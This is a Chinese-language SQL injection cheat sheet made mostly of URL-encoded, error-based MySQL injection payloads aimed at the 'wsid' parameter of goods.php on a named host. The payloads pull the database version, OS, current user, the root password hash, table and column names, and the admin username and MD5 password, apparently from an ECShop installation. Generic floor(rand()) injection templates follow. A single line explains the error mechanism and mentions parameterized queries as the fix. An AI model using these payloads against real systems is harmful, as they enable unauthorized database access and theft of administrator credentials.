判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库表名
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 user_name 字段
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
获得 admin passwd(md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
报错注射（以下语句依赖 MySQL 对 floor(rand(0)*2) 分组计数时抛出的重复键错误，把查询结果带回到错误信息中；使用参数化查询并关闭数据库错误回显即可阻断这一类回显途径）
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |